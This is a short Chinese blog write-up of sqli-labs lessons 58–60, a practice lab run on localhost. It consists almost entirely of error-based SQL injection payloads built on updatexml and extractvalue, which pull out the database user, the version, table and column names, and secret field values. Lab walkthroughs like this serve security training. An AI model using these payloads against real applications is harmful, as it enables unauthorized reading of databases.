Less58,59,60【强制报错注入】

Less58 测试union查询无显示,测试报错注入均成功
方式1:
?id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
方式2:
?id=1' union select extractvalue(1,concat(0x7e,(select @@version),0x7e))--+
表名:
id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='CHALLENGES'),0x7e),1)--+
列名
http://127.0.0.1/sqli-labs-master/Less-58/
?id=1%27%20and%20updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='5bypzr86n6'),0x7e),1)--+
 
字段内容
http://127.0.0.1/sqli-labs-master/Less-58/
?id=1%27%20and%20updatexml(1,concat(0x7e,(select group_concat(secret_Y15Z) from CHALLENGES.pzkk7hwo7o),0x7e),1)--+
 
Less59
无闭合符号
表名
and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='CHALLENGES'),0x7e),1)--+
列名
and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='bp9qzw6kvm'),0x7e),1)--+
字段内容
and updatexml(1,concat(0x7e,(select group_concat(secret_E9SN) from CHALLENGES.bp9qzw6kvm),0x7e),1)--+
 
Less60与58.59一致
posted @ 2020-12-14 15:00  峰中追风  阅读(120)  评论(0编辑  收藏  举报

___________________________________________________________________________________________没有白跑的路